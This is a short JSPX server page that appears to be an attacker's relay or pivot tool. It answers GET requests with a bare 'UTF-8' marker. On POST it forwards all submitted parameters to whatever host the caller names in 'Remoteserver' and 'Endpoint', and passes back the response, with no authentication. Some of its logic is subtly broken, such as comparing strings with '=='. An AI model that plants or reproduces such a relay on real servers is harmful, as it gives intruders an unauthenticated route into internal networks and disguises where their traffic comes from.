<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
		<jsp:directive.page contentType="text/html" pageEncoding="utf-8"/>
		<jsp:directive.page import="java.net.*"/>
		<jsp:directive.page import="java.util.*"/>
		<jsp:directive.page import="java.io.*"/>

<jsp:scriptlet>
    final class HttpRequest {
        public String sendPost(String url, byte[] param) {
            BufferedReader in = null;
            OutputStream ou = null;
            String result = "";
            try {
                URL realUrl = new URL(url);
                URLConnection conn = realUrl.openConnection();
				conn.setConnectTimeout(10000);
				conn.setReadTimeout(10000);
				conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
				//conn.setRequestProperty("accept", "*/*");
                //conn.setRequestProperty("Connection", "keep-alive");
                conn.setDoOutput(true);
                conn.setDoInput(true);
                ou = conn.getOutputStream();
                ou.write(param);
                ou.flush();
                in = new BufferedReader(
                        new InputStreamReader(conn.getInputStream()));
                String line;
                while ((line = in.readLine()) != null) {
                    result += line;
                }
            } catch (Exception e) {
                System.out.println("error to send post！" + e);
                return e.toString();
            } finally {
                try {
                    if (ou != null) {
                        ou.close();
                    }
                    if (in != null) {
                        in.close();
                    }
                } catch (IOException ex) {
                    return ex.toString();
                }
            }
            return result;
        }
    }
</jsp:scriptlet>
<jsp:scriptlet>
    String method = request.getMethod();
    if (method == "GET") {
        out.print("UTF-8");
        return;
    } else if (method == "POST") {
        String Endpoint = request.getParameter("Endpoint");
        String Remoteserver = request.getParameter("Remoteserver");
        String url = Remoteserver + Endpoint;
        String post_arg = "";
        String returnString="";
        Enumeration enu = request.getParameterNames();
        while (enu.hasMoreElements()) {
            String paraName = (String) enu.nextElement();
            post_arg = post_arg+paraName+"="+request.getParameter(URLEncoder.encode(paraName,"UTF-8"))+"&amp;";
        }
		HttpRequest tmp = new HttpRequest();
        returnString = tmp.sendPost(url, post_arg.getBytes());
        out.print(returnString);
    }
</jsp:scriptlet>
</jsp:root>